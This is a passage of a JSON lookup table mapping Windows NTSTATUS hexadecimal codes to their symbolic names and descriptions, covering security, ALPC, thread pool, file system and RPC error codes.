forest.\"\n        },\n        \"c000041c\": {\n            \"code\": \"STATUS_INVALID_USER_PRINCIPAL_NAME\",\n            \"description\": \"The User Principal Name (UPN) is invalid.\"\n        },\n        \"c0000420\": {\n            \"code\": \"STATUS_ASSERTION_FAILURE\",\n            \"description\": \"There has been an assertion failure.\"\n        },\n        \"c0000421\": {\n            \"code\": \"STATUS_VERIFIER_STOP\",\n            \"description\": \"Application verifier has found an error in the current process.\"\n        },\n        \"c0000423\": {\n            \"code\": \"STATUS_CALLBACK_POP_STACK\",\n            \"description\": \"A user mode unwind is in progress.\"\n        },\n        \"c0000424\": {\n            \"code\": \"STATUS_INCOMPATIBLE_DRIVER_BLOCKED\",\n            \"description\": \"%2 has been blocked from loading due to incompatibility with this system. Contact your software vendor for a compatible version of the driver.\"\n        },\n        \"c0000425\": {\n            \"code\": \"STATUS_HIVE_UNLOADED\",\n            \"description\": \"Illegal operation attempted on a registry key which has already been unloaded.\"\n        },\n        \"c0000426\": {\n            \"code\": \"STATUS_COMPRESSION_DISABLED\",\n            \"description\": \"Compression is disabled for this volume.\"\n        },\n        \"c0000427\": {\n            \"code\": \"STATUS_FILE_SYSTEM_LIMITATION\",\n            \"description\": \"The requested operation could not be completed due to a file system limitation.\"\n        },\n        \"c0000428\": {\n            \"code\": \"STATUS_INVALID_IMAGE_HASH\",\n            \"description\": \"The hash for image %hs cannot be found in the system catalogs. The image is likely corrupt or the victim of tampering.\"\n        },\n        \"c0000429\": {\n            \"code\": \"STATUS_NOT_CAPABLE\",\n            \"description\": \"The implementation is not capable of performing the request.\"\n        },\n        \"c000042a\": {\n            \"code\": \"STATUS_REQUEST_OUT_OF_SEQUENCE\",\n            \"description\": \"The requested operation is out of order with respect to other operations.\"\n        },\n        \"c000042b\": {\n            \"code\": \"STATUS_IMPLEMENTATION_LIMIT\",\n            \"description\": \"An operation attempted to exceed an implementation-defined limit.\"\n        },\n        \"c000042c\": {\n            \"code\": \"STATUS_ELEVATION_REQUIRED\",\n            \"description\": \"The requested operation requires elevation.\"\n        },\n        \"c000042d\": {\n            \"code\": \"STATUS_NO_SECURITY_CONTEXT\",\n            \"description\": \"The required security context does not exist.\"\n        },\n        \"c000042e\": {\n            \"code\": \"STATUS_PKU2U_CERT_FAILURE\",\n            \"description\": \"The PKU2U protocol encountered an error while attempting to utilize the associated certificates.\"\n        },\n        \"c0000432\": {\n            \"code\": \"STATUS_BEYOND_VDL\",\n            \"description\": \"The operation was attempted beyond the valid data length of the file.\"\n        },\n        \"c0000433\": {\n            \"code\": \"STATUS_ENCOUNTERED_WRITE_IN_PROGRESS\",\n            \"description\": \"The attempted write operation encountered a write already in progress for some portion of the range.\"\n        },\n        \"c0000434\": {\n            \"code\": \"STATUS_PTE_CHANGED\",\n            \"description\": \"The page fault mappings changed in the middle of processing a fault so the operation must be retried.\"\n        },\n        \"c0000435\": {\n            \"code\": \"STATUS_PURGE_FAILED\",\n            \"description\": \"The attempt to purge this file from memory failed to purge some or all the data from memory.\"\n        },\n        \"c0000440\": {\n            \"code\": \"STATUS_CRED_REQUIRES_CONFIRMATION\",\n            \"description\": \"The requested credential requires confirmation.\"\n        },\n        \"c0000441\": {\n            \"code\": \"STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE\",\n            \"description\": \"The remote server sent an invalid response for a file being opened with Client Side Encryption.\"\n        },\n        \"c0000442\": {\n            \"code\": \"STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER\",\n            \"description\": \"Client Side Encryption is not supported by the remote server even though it claims to support it.\"\n        },\n        \"c0000443\": {\n            \"code\": \"STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE\",\n            \"description\": \"File is encrypted and should be opened in Client Side Encryption mode.\"\n        },\n        \"c0000444\": {\n            \"code\": \"STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE\",\n            \"description\": \"A new encrypted file is being created and a $EFS needs to be provided.\"\n        },\n        \"c0000445\": {\n            \"code\": \"STATUS_CS_ENCRYPTION_FILE_NOT_CSE\",\n            \"description\": \"The SMB client requested a CSE FSCTL on a non-CSE file.\"\n        },\n        \"c0000446\": {\n            \"code\": \"STATUS_INVALID_LABEL\",\n            \"description\": \"Indicates a particular Security ID cannot be assigned as the label of an object.\"\n        },\n        \"c0000450\": {\n            \"code\": \"STATUS_DRIVER_PROCESS_TERMINATED\",\n            \"description\": \"The process hosting the driver for this device has terminated.\"\n        },\n        \"c0000451\": {\n            \"code\": \"STATUS_AMBIGUOUS_SYSTEM_DEVICE\",\n            \"description\": \"The requested system device cannot be identified due to multiple indistinguishable devices potentially matching the identification criteria.\"\n        },\n        \"c0000452\": {\n            \"code\": \"STATUS_SYSTEM_DEVICE_NOT_FOUND\",\n            \"description\": \"The requested system device cannot be found.\"\n        },\n        \"c0000453\": {\n            \"code\": \"STATUS_RESTART_BOOT_APPLICATION\",\n            \"description\": \"This boot application must be restarted.\"\n        },\n        \"c0000454\": {\n            \"code\": \"STATUS_INSUFFICIENT_NVRAM_RESOURCES\",\n            \"description\": \"Insufficient NVRAM resources exist to complete the API.  A reboot might be required.\"\n        },\n        \"c0000460\": {\n            \"code\": \"STATUS_NO_RANGES_PROCESSED\",\n            \"description\": \"No ranges for the specified operation were able to be processed.\"\n        },\n        \"c0000463\": {\n            \"code\": \"STATUS_DEVICE_FEATURE_NOT_SUPPORTED\",\n            \"description\": \"The storage device does not support Offload Write.\"\n        },\n        \"c0000464\": {\n            \"code\": \"STATUS_DEVICE_UNREACHABLE\",\n            \"description\": \"Data cannot be moved because the source device cannot communicate with the destination device.\"\n        },\n        \"c0000465\": {\n            \"code\": \"STATUS_INVALID_TOKEN\",\n            \"description\": \"The token representing the data is invalid or expired.\"\n        },\n        \"c0000466\": {\n            \"code\": \"STATUS_SERVER_UNAVAILABLE\",\n            \"description\": \"The file server is temporarily unavailable.\"\n        },\n        \"c0000467\": {\n            \"code\": \"STATUS_FILE_NOT_AVAILABLE\",\n            \"description\": \"The file is temporarily unavailable.\"\n        },\n        \"c0000480\": {\n            \"code\": \"STATUS_SHARE_UNAVAILABLE\",\n            \"description\": \"The share is temporarily unavailable.\"\n        },\n        \"c0000500\": {\n            \"code\": \"STATUS_INVALID_TASK_NAME\",\n            \"description\": \"The specified task name is invalid.\"\n        },\n        \"c0000501\": {\n            \"code\": \"STATUS_INVALID_TASK_INDEX\",\n            \"description\": \"The specified task index is invalid.\"\n        },\n        \"c0000502\": {\n            \"code\": \"STATUS_THREAD_ALREADY_IN_TASK\",\n            \"description\": \"The specified thread is already joining a task.\"\n        },\n        \"c0000503\": {\n            \"code\": \"STATUS_CALLBACK_BYPASS\",\n            \"description\": \"A callback has requested to bypass native code.\"\n        },\n        \"c0000602\": {\n            \"code\": \"STATUS_FAIL_FAST_EXCEPTION\",\n            \"description\": \"A fail fast exception occurred. Exception handlers will not be invoked and the process will be terminated immediately.\"\n        },\n        \"c0000603\": {\n            \"code\": \"STATUS_IMAGE_CERT_REVOKED\",\n            \"description\": \"Windows cannot verify the digital signature for this file. The signing certificate for this file has been revoked.\"\n        },\n        \"c0000700\": {\n            \"code\": \"STATUS_PORT_CLOSED\",\n            \"description\": \"The ALPC port is closed.\"\n        },\n        \"c0000701\": {\n            \"code\": \"STATUS_MESSAGE_LOST\",\n            \"description\": \"The ALPC message requested is no longer available.\"\n        },\n        \"c0000702\": {\n            \"code\": \"STATUS_INVALID_MESSAGE\",\n            \"description\": \"The ALPC message supplied is invalid.\"\n        },\n        \"c0000703\": {\n            \"code\": \"STATUS_REQUEST_CANCELED\",\n            \"description\": \"The ALPC message has been canceled.\"\n        },\n        \"c0000704\": {\n            \"code\": \"STATUS_RECURSIVE_DISPATCH\",\n            \"description\": \"Invalid recursive dispatch attempt.\"\n        },\n        \"c0000705\": {\n            \"code\": \"STATUS_LPC_RECEIVE_BUFFER_EXPECTED\",\n            \"description\": \"No receive buffer has been supplied in a synchronous request.\"\n        },\n        \"c0000706\": {\n            \"code\": \"STATUS_LPC_INVALID_CONNECTION_USAGE\",\n            \"description\": \"The connection port is used in an invalid context.\"\n        },\n        \"c0000707\": {\n            \"code\": \"STATUS_LPC_REQUESTS_NOT_ALLOWED\",\n            \"description\": \"The ALPC port does not accept new request messages.\"\n        },\n        \"c0000708\": {\n            \"code\": \"STATUS_RESOURCE_IN_USE\",\n            \"description\": \"The resource requested is already in use.\"\n        },\n        \"c0000709\": {\n            \"code\": \"STATUS_HARDWARE_MEMORY_ERROR\",\n            \"description\": \"The hardware has reported an uncorrectable memory error.\"\n        },\n        \"c000070a\": {\n            \"code\": \"STATUS_THREADPOOL_HANDLE_EXCEPTION\",\n            \"description\": \"Status 0x%08x was returned, waiting on handle 0x%x for wait 0x%p, in waiter 0x%p.\"\n        },\n        \"c000070b\": {\n            \"code\": \"STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED\",\n            \"description\": \"After a callback to 0x%p(0x%p), a completion call to Set event(0x%p) failed with status 0x%08x.\"\n        },\n        \"c000070c\": {\n            \"code\": \"STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED\",\n            \"description\": \"After a callback to 0x%p(0x%p), a completion call to ReleaseSemaphore(0x%p, %d) failed with status 0x%08x.\"\n        },\n        \"c000070d\": {\n            \"code\": \"STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED\",\n            \"description\": \"After a callback to 0x%p(0x%p), a completion call to ReleaseMutex(%p) failed with status 0x%08x.\"\n        },\n        \"c000070e\": {\n            \"code\": \"STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED\",\n            \"description\": \"After a callback to 0x%p(0x%p), a completion call to FreeLibrary(%p) failed with status 0x%08x.\"\n        },\n        \"c000070f\": {\n            \"code\": \"STATUS_THREADPOOL_RELEASED_DURING_OPERATION\",\n            \"description\": \"The thread pool 0x%p was released while a thread was posting a callback to 0x%p(0x%p) to it.\"\n        },\n        \"c0000710\": {\n            \"code\": \"STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING\",\n            \"description\": \"A thread pool worker thread is impersonating a client, after a callback to 0x%p(0x%p). This is unexpected, indicating that the callback is missing a call to revert the impersonation.\"\n        },\n        \"c0000711\": {\n            \"code\": \"STATUS_APC_RETURNED_WHILE_IMPERSONATING\",\n            \"description\": \"A thread pool worker thread is impersonating a client, after executing an APC. This is unexpected, indicating that the APC is missing a call to revert the impersonation.\"\n        },\n        \"c0000712\": {\n            \"code\": \"STATUS_PROCESS_IS_PROTECTED\",\n            \"description\": \"Either the target process, or the target thread's containing process, is a protected process.\"\n        },\n        \"c0000713\": {\n            \"code\": \"STATUS_MCA_EXCEPTION\",\n            \"description\": \"A thread is getting dispatched with MCA EXCEPTION because of MCA.\"\n        },\n        \"c0000714\": {\n            \"code\": \"STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE\",\n            \"description\": \"The client certificate account mapping is not unique.\"\n        },\n        \"c0000715\": {\n            \"code\": \"STATUS_SYMLINK_CLASS_DISABLED\",\n            \"description\": \"The symbolic link cannot be followed because its type is disabled.\"\n        },\n        \"c0000716\": {\n            \"code\": \"STATUS_INVALID_IDN_NORMALIZATION\",\n            \"description\": \"Indicates that the specified string is not valid for IDN normalization.\"\n        },\n        \"c0000717\": {\n            \"code\": \"STATUS_NO_UNICODE_TRANSLATION\",\n            \"description\": \"No mapping for the Unicode character exists in the target multi-byte code page.\"\n        },\n        \"c0000718\": {\n            \"code\": \"STATUS_ALREADY_REGISTERED\",\n            \"description\": \"The provided callback is already registered.\"\n        },\n        \"c0000719\": {\n            \"code\": \"STATUS_CONTEXT_MISMATCH\",\n            \"description\": \"The provided context did not match the target.\"\n        },\n        \"c000071a\": {\n            \"code\": \"STATUS_PORT_ALREADY_HAS_COMPLETION_LIST\",\n            \"description\": \"The specified port already has a completion list.\"\n        },\n        \"c000071b\": {\n            \"code\": \"STATUS_CALLBACK_RETURNED_THREAD_PRIORITY\",\n            \"description\": \"A threadpool worker thread entered a callback at thread base priority 0x%x and exited at priority 0x%x.This is unexpected, indicating that the callback missed restoring the priority.\"\n        },\n        \"c000071c\": {\n            \"code\": \"STATUS_INVALID_THREAD\",\n            \"description\": \"An invalid thread, handle %p, is specified for this operation. Possibly, a threadpool worker thread was specified.\"\n        },\n        \"c000071d\": {\n            \"code\": \"STATUS_CALLBACK_RETURNED_TRANSACTION\",\n            \"description\": \"A threadpool worker thread entered a callback, which left transaction state.This is unexpected, indicating that the callback missed clearing the transaction.\"\n        },\n        \"c000071e\": {\n            \"code\": \"STATUS_CALLBACK_RETURNED_LDR_LOCK\",\n            \"description\": \"A threadpool worker thread entered a callback, which left the loader lock held.This is unexpected, indicating that the callback missed releasing the lock.\"\n        },\n        \"c000071f\": {\n            \"code\": \"STATUS_CALLBACK_RETURNED_LANG\",\n            \"description\": \"A threadpool worker thread entered a callback, which left with preferred languages set.This is unexpected, indicating that the callback missed clearing them.\"\n        },\n        \"c0000720\": {\n            \"code\": \"STATUS_CALLBACK_RETURNED_PRI_BACK\",\n            \"description\": \"A threadpool worker thread entered a callback, which left with background priorities set.This is unexpected, indicating that the callback missed restoring the original priorities.\"\n        },\n        \"c0000721\": {\n            \"code\": \"STATUS_CALLBACK_RETURNED_THREAD_AFFINITY\",\n            \"description\": \"A threadpool worker thread entered a callback at thread affinity %p and exited at affinity %p.This is unexpected, indicating that the callback missed restoring the priority.\"\n        },\n        \"c0000800\": {\n            \"code\": \"STATUS_DISK_REPAIR_DISABLED\",\n            \"description\": \"The attempted operation required self healing to be enabled.\"\n        },\n        \"c0000801\": {\n            \"code\": \"STATUS_DS_DOMAIN_RENAME_IN_PROGRESS\",\n            \"description\": \"The directory service cannot perform the requested operation because a domain rename operation is in progress.\"\n        },\n        \"c0000802\": {\n            \"code\": \"STATUS_DISK_QUOTA_EXCEEDED\",\n            \"description\": \"An operation failed because the storage quota was exceeded.\"\n        },\n        \"c0000804\": {\n            \"code\": \"STATUS_CONTENT_BLOCKED\",\n            \"description\": \"An operation failed because the content was blocked.\"\n        },\n        \"c0000805\": {\n            \"code\": \"STATUS_BAD_CLUSTERS\",\n            \"description\": \"The operation could not be completed due to bad clusters on disk.\"\n        },\n        \"c0000806\": {\n            \"code\": \"STATUS_VOLUME_DIRTY\",\n            \"description\": \"The operation could not be completed because the volume is dirty. Please run the Chkdsk utility and try again.\"\n        },\n        \"c0000901\": {\n            \"code\": \"STATUS_FILE_CHECKED_OUT\",\n            \"description\": \"This file is checked out or locked for editing by another user.\"\n        },\n        \"c0000902\": {\n            \"code\": \"STATUS_CHECKOUT_REQUIRED\",\n            \"description\": \"The file must be checked out before saving changes.\"\n        },\n        \"c0000903\": {\n            \"code\": \"STATUS_BAD_FILE_TYPE\",\n            \"description\": \"The file type being saved or retrieved has been blocked.\"\n        },\n        \"c0000904\": {\n            \"code\": \"STATUS_FILE_TOO_LARGE\",\n            \"description\": \"The file size exceeds the limit allowed and cannot be saved.\"\n        },\n        \"c0000905\": {\n            \"code\": \"STATUS_FORMS_AUTH_REQUIRED\",\n            \"description\": \"Access Denied. Before opening files in this location, you must first browse to the e.g. site and select the option to log on automatically.\"\n        },\n        \"c0000906\": {\n            \"code\": \"STATUS_VIRUS_INFECTED\",\n            \"description\": \"The operation did not complete successfully because the file contains a virus.\"\n        },\n        \"c0000907\": {\n            \"code\": \"STATUS_VIRUS_DELETED\",\n            \"description\": \"This file contains a virus and cannot be opened. Due to the nature of this virus, the file has been removed from this location.\"\n        },\n        \"c0000908\": {\n            \"code\": \"STATUS_BAD_MCFG_TABLE\",\n            \"description\": \"The resources required for this device conflict with the MCFG table.\"\n        },\n        \"c0000909\": {\n            \"code\": \"STATUS_CANNOT_BREAK_OPLOCK\",\n            \"description\": \"The operation did not complete successfully because it would cause an oplock to be broken. The caller has requested that existing oplocks not be broken.\"\n        },\n        \"c0009898\": {\n            \"code\": \"STATUS_WOW_ASSERTION\",\n            \"description\": \"WOW Assertion Error.\"\n        },\n        \"c000a000\": {\n            \"code\": \"STATUS_INVALID_SIGNATURE\",\n            \"description\": \"The cryptographic signature is invalid.\"\n        },\n        \"c000a001\": {\n            \"code\": \"STATUS_HMAC_NOT_SUPPORTED\",\n            \"description\": \"The cryptographic provider does not support HMAC.\"\n        },\n        \"c000a010\": {\n            \"code\": \"STATUS_IPSEC_QUEUE_OVERFLOW\",\n            \"description\": \"The IPsec queue overflowed.\"\n        },\n        \"c000a011\": {\n            \"code\": \"STATUS_ND_QUEUE_OVERFLOW\",\n            \"description\": \"The neighbor discovery queue overflowed.\"\n        },\n        \"c000a012\": {\n            \"code\": \"STATUS_HOPLIMIT_EXCEEDED\",\n            \"description\": \"An Internet Control Message Protocol (ICMP) hop limit exceeded error was received.\"\n        },\n        \"c000a013\": {\n            \"code\": \"STATUS_PROTOCOL_NOT_SUPPORTED\",\n            \"description\": \"The protocol is not installed on the local machine.\"\n        },\n        \"c000a080\": {\n            \"code\": \"STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED\",\n            \"description\": \"{Delayed Write Failed} Windows was unable to save all the data for the file %hs; the data has been lost. This error might be caused by network connectivity issues. Try to save this file elsewhere.\"\n        },\n        \"c000a081\": {\n            \"code\": \"STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR\",\n            \"description\": \"{Delayed Write Failed} Windows was unable to save all the data for the file %hs; the data has been lost. This error was returned by the server on which the file exists. Try to save this file elsewhere.\"\n        },\n        \"c000a082\": {\n            \"code\": \"STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR\",\n            \"description\": \"{Delayed Write Failed} Windows was unable to save all the data for the file %hs; the data has been lost. This error might be caused if the device has been removed or the media is write-protected.\"\n        },\n        \"c000a083\": {\n            \"code\": \"STATUS_XML_PARSE_ERROR\",\n            \"description\": \"Windows was unable to parse the requested XML data.\"\n        },\n        \"c000a084\": {\n            \"code\": \"STATUS_XMLDSIG_ERROR\",\n            \"description\": \"An error was encountered while processing an XML digital signature.\"\n        },\n        \"c000a085\": {\n            \"code\": \"STATUS_WRONG_COMPARTMENT\",\n            \"description\": \"This indicates that the caller made the connection request in the wrong routing compartment.\"\n        },\n        \"c000a086\": {\n            \"code\": \"STATUS_AUTHIP_FAILURE\",\n            \"description\": \"This indicates that there was an AuthIP failure when attempting to connect to the remote host.\"\n        },\n        \"c000a087\": {\n            \"code\": \"STATUS_DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS\",\n            \"description\": \"OID mapped groups cannot have members.\"\n        },\n        \"c000a088\": {\n            \"code\": \"STATUS_DS_OID_NOT_FOUND\",\n            \"description\": \"The specified OID cannot be found.\"\n        },\n        \"c000a100\": {\n            \"code\": \"STATUS_HASH_NOT_SUPPORTED\",\n            \"description\": \"Hash generation for the specified version and hash type is not enabled on server.\"\n        },\n        \"c000a101\": {\n            \"code\": \"STATUS_HASH_NOT_PRESENT\",\n            \"description\": \"The hash requests is not present or not up to date with the current file contents.\"\n        },\n        \"c000a2a1\": {\n            \"code\": \"STATUS_OFFLOAD_READ_FLT_NOT_SUPPORTED\",\n            \"description\": \"A file system filter on the server has not opted in for Offload Read support.\"\n        },\n        \"c000a2a2\": {\n            \"code\": \"STATUS_OFFLOAD_WRITE_FLT_NOT_SUPPORTED\",\n            \"description\": \"A file system filter on the server has not opted in for Offload Write support.\"\n        },\n        \"c000a2a3\": {\n            \"code\": \"STATUS_OFFLOAD_READ_FILE_NOT_SUPPORTED\",\n            \"description\": \"Offload read operations cannot be performed on: Compressed files, Sparse files, Encrypted files, File system metadata files\"\n        },\n        \"c000a2a4\": {\n            \"code\": \"STATUS_OFFLOAD_WRITE_FILE_NOT_SUPPORTED\",\n            \"description\": \"Offload write operations cannot be performed on: Compressed files, Sparse files, Encrypted files, File system metadata files\"\n        },\n        \"c0010001\": {\n            \"code\": \"DBG_NO_STATE_CHANGE\",\n            \"description\": \"The debugger did not perform a state change.\"\n        },\n        \"c0010002\": {\n            \"code\": \"DBG_APP_NOT_IDLE\",\n            \"description\": \"The debugger found that the application is not idle.\"\n        },\n        \"c0020001\": {\n            \"code\": \"RPC_NT_INVALID_STRING_BINDING\",\n            \"description\": \"The string binding is invalid.\"\n        },\n        \"c0020002\": {\n            \"code\": \"RPC_NT_WRONG_KIND_OF_BINDING\",\n            \"description\": \"The binding handle is not the correct type.\"\n        },\n        \"c0020003\": {\n            \"code\": \"RPC_NT_INVALID_BINDING\",\n            \"description\": \"The binding handle is invalid.\"\n        },\n        \"c0020004\": {\n            \"code\": \"RPC_NT_PROTSEQ_NOT_SUPPORTED\",\n            \"description\": \"The RPC protocol sequence is not supported.\"\n        },\n        \"c0020005\": {\n            \"code\": \"RPC_NT_INVALID_RPC_PROTSEQ\",\n            \"description\": \"The RPC protocol sequence is invalid.\"\n        },\n        \"c0020006\": {\n            \"code\": \"RPC_NT_INVALID_STRING_UUID\",\n            \"description\": \"The string UUID is invalid.\"\n        },\n        \"c0020007\": {\n            \"code\": \"RPC_NT_INVALID_ENDPOINT_FORMAT\",\n            \"description\": \"The endpoint format is invalid.\"\n        },\n        \"c0020008\": {\n            \"code\": \"RPC_NT_INVALID_NET_ADDR\",\n            \"description\": \"The network address is invalid.\"\n        },\n        \"c0020009\": {\n            \"code\": \"RPC_NT_NO_ENDPOINT_FOUND\",\n            \"description\": \"No endpoint was found.\"\n        },\n        \"c002000a\": {\n            \"code\": \"RPC_NT_INVALID_TIMEOUT\",\n            \"description\": \"The time-out value is invalid.\"\n        },\n        \"c002000b\": {\n            \"code\": \"RPC_NT_OBJECT_NOT_FOUND\",\n            \"description\": \"The object UUID was not found.\"\n        },\n        \"c002000c\": {\n            \"code\": \"RPC_NT_ALREADY_REGISTERED\",\n            \"description\": \"The object UUID has already been registered.\"\n        },\n        \"c002000d\": {\n            \"code\": \"RPC_NT_TYPE_ALREADY_REGISTERED\",\n            \"description\": \"The type UUID has already been registered.\"\n        },\n        \"c002000e\": {\n            \"code\": \"RPC_NT_ALREADY_LISTENING\",\n            \"description\": \"The RPC server is already listening.\"\n        },\n        \"c002000f\": {\n            \"code\": \"RPC_NT_NO_PROTSEQS_REGISTERED\",\n            \"description\": \"No protocol sequences have been registered.\"\n        },\n        \"c0020010\": {\n            \"code\": \"RPC_NT_NOT_LISTENING\",\n            \"description\": \"The RPC server is not listening.\"\n        },\n        \"c0020011\": {\n            \"code\": \"RPC_NT_UNKNOWN_MGR_TYPE\",\n            \"description\": \"The manager type is unknown.\"\n        },\n        \"c0020012\": {\n            \"code\": \"RPC_NT_UNKNOWN_IF\",\n            \"description\": \"The interface is unknown.\"\n        },\n        \"c0020013\": {\n            \"code\": \"RPC_NT_NO_BINDINGS\",\n            \"description\": \"There are no bindings.\"\n        },\n        \"c0020014\": {\n            \"code\": \"RPC_NT_NO_PROTSEQS\",\n            \"description\": \"There are no protocol sequences.\"\n        },\n        \"c0020015\": {\n            \"code\": \"RPC_NT_CANT_CREATE_ENDPOINT\",\n            \"description\": \"The endpoint cannot be created.\"\n        },\n        \"c0020016\": {\n            \"code\": \"RPC_NT_OUT_OF_RESOURCES\",\n            \"description\": \"Insufficient resources are available to complete this operation.\"\n        },\n        \"c0020017\": {\n            \"code\": \"RPC_NT_SERVER_UNAVAILABLE\",\n            \"description\": \"The RPC server is unavailable.\"\n        },\n        \"c0020018\": {\n            \"code\": \"RPC_NT_SERVER_TOO_BUSY\",\n            \"description\": \"The RPC server is too busy to complete this operation.\"\n        },\n        \"c0020019\": {\n            \"code\": \"RPC_NT_INVALID_NETWORK_OPTIONS\",\n            \"description\": \"The network options are invalid.\"\n        },\n        \"c002001a\": {\n            \"code\": \"RPC_NT_NO_CALL_ACTIVE\",\n            \"description\": \"No RPCs are active on this thread.\"\n        },\n        \"c002001b\": {\n            \"code\": \"RPC_NT_CALL_FAILED\",\n            \"description\": \"The RPC failed.\"\n        },\n        \"c002001c\": {\n            \"code\": \"RPC_NT_CALL_FAILED_DNE\",\n            \"description\": \"The RPC failed and did not execute.\"\n        },\n        \"c002001d\": {\n            \"code\": \"RPC_NT_PROTOCOL_ERROR\",\n            \"description\": \"An RPC protocol error occurred.\"\n        },\n        \"c002001f\": {\n            \"code\": \"RPC_NT_UNSUPPORTED_TRANS_SYN\",\n            \"description\": \"The RPC server does not support the transfer syntax.\"\n        },\n        \"c0020021\": {\n            \"code\": \"RPC_NT_UNSUPPORTED_TYPE\",\n            \"description\": \"The type UUID is not supported.\"\n        },\n        \"c0020022\": {\n            \"code\": \"RPC_NT_INVALID_TAG\",\n            \"description\": \"The tag is invalid.\"\n        },\n        \"c0020023\": {\n            \"code\": \"RPC_NT_INVALID_BOUND\",\n            \"description\": \"The array bounds are invalid.\"\n        },\n        \"c0020024\": {\n            \"code\": \"RPC_NT_NO_ENTRY_NAME\",\n            \"description\": \"The binding does not contain an entry name.\"\n        },\n        \"c0020025\": {\n            \"code\": \"RPC_NT_INVALID_NAME_SYNTAX\",\n            \"description\": \"The name syntax is invalid.\"\n        },\n        \"c0020026\": {\n            \"code\": \"RPC_NT_UNSUPPORTED_NAME_SYNTAX\",\n            \"description\": \"The name syntax is not supported.\"\n        },\n        \"c0020028\": {\n            \"code\": \"RPC_NT_UUID_NO_ADDRESS\",\n            \"description\": \"No network address is available to construct a UUID.\"\n        },\n        \"c0020029\": {\n            \"code\": \"RPC_NT_DUPLICATE_ENDPOINT\",\n            \"description\": \"The endpoint is a duplicate.\"\n        },\n        \"c002002a\": {\n            \"code\": \"RPC_NT_UNKNOWN_AUTHN_TYPE\",\n            \"description\": \"The authentication type is unknown.\"\n        },\n        \"c002002b\": {\n            \"code\": \"RPC_NT_MAX_CALLS_TOO_SMALL\",\n            \"description\": \"The maximum number of calls is too small.\"\n        },\n        \"c002002c\": {\n            \"code\": \"RPC_NT_STRING_TOO_LONG\",\n            \"description\": \"The string is too long.\"\n        },\n        \"c002002d\": {\n            \"code\": \"RPC_NT_PROTSEQ_NOT_FOUND\",\n            \"description\": \"The RPC protocol sequence was not found.\"\n        },\n        \"c002002e\": {\n            \"code\": \"RPC_NT_PROCNUM_OUT_OF_RANGE\",\n            \"description\": \"The procedure number is out of range.\"\n        },\n        \"c002002f\": {\n            \"code\": \"RPC_NT_BINDING_HAS_NO_AUTH\",\n            \"description\": \"The binding does not contain any authentication information.\"\n        },\n        \"c0020030\": {\n            \"code\": \"RPC_NT_UNKNOWN_AUTHN_SERVICE\",\n            \"description\": \"The authentication service is unknown.\"\n        },\n        \"c0020031\": {\n            \"code\": \"RPC_NT_UNKNOWN_AUTHN_LEVEL\",\n            \"description\": \"The authentication level is unknown.\"\n        },\n        \"c0020032\": {\n            \"code\": \"RPC_NT_INVALID_AUTH_IDENTITY\",\n            \"description\": \"The security context is invalid.\"\n        },\n        \"c0020033\": {\n            \"code\": \"RPC_NT_UNKNOWN_AUTHZ_SERVICE\",\n            \"description\": \"The authorization service is unknown.\"\n        },\n        \"c0020034\": {\n            \"code\": \"EPT_NT_INVALID_ENTRY\",\n            \"description\": \"The entry is invalid.\"\n        },\n        \"c0020035\": {\n            \"code\": \"EPT_NT_CANT_PERFORM_OP\",\n            \"description\": \"The operation cannot be performed.\"\n        },\n        \"c0020036\": {\n            \"code\": \"EPT_NT_NOT_REGISTERED\",\n            \"description\": \"No more endpoints are available from the endpoint mapper.\"\n        },\n        \"c0020037\": {\n            \"code\": \"RPC_NT_NOTHING_TO_EXPORT\",\n            \"description\": \"No interfaces have been exported.\"\n        },\n        \"c0020038\": {\n            \"code\": \"RPC_NT_INCOMPLETE_NAME\",\n            \"description\": \"The entry name is incomplete.\"\n        },\n        \"c0020039\": {\n            \"code\": \"RPC_NT_INVALID_VERS_OPTION\",\n            \"description\": \"The version option is invalid.\"\n        },\n        \"c002003a\": {\n            \"code\": \"RPC_NT_NO_MORE_MEMBERS\",\n            \"description\": \"There are no more members.\"\n        },\n        \"c002003b\": {\n            \"code\": \"RPC_NT_NOT_ALL_OBJS_UNEXPORTED\",\n            \"description\": \"There is nothing to unexport.\"\n        },\n        \"c002003c\": {\n            \"code\": \"RPC_NT_INTERFACE_NOT_FOUND\",\n            \"description\": \"The interface was not found.\"\n        },\n        \"c002003d\": {\n            \"code\": \"RPC_NT_ENTRY_ALREADY_EXISTS\",\n            \"description\": \"The entry already exists.\"\n        },\n        \"c002003e\": {\n            \"code\": \"RPC_NT_ENTRY_NOT_FOUND\",\n            \"description\": \"The entry was not found.\"\n        },\n        \"c002003f\": {\n            \"code\": \"RPC_NT_NAME_SERVICE_UNAVAILABLE\",\n            \"description\": \"The name service is unavailable.\"\n        },\n        \"c0020040\": {\n            \"code\": \"RPC_NT_INVALID_NAF_ID\",\n            \"description\": \"The network address family is invalid.\"\n        },\n        \"c0020041\": {\n            \"code\": \"RPC_NT_CANNOT_SUPPORT\",\n            \"description\": \"The requested operation is not supported.\"\n        },\n        \"c0020042\": {\n            \"code\": \"RPC_NT_NO_CONTEXT_AVAILABLE\",\n            \"description\": \"No security context is available to allow impersonation.\"\n        },\n        \"c0020043\": {\n            \"code\": \"RPC_NT_INTERNAL_ERROR\",\n            \"description\": \"An internal error occurred in the RPC.\"\n        },\n        \"c0020044\": {\n            \"code\": \"RPC_NT_ZERO_DIVIDE\",\n            \"description\": \"The RPC server attempted to divide an integer by zero.\"\n        },\n        \"c0020045\": {\n            \"code\": \"RPC_NT_ADDRESS_ERROR\",\n            \"description\": \"An addressing error occurred in the RPC server.\"\n        },\n        \"c0020046\": {\n            \"code\": \"RPC_NT_FP_DIV_ZERO\",\n            \"description\": \"A floating point operation at the RPC server caused a divide by zero.\"\n        },\n        \"c0020047\": {\n            \"code\": \"RPC_NT_FP_UNDERFLOW\",\n            \"description\": \"A 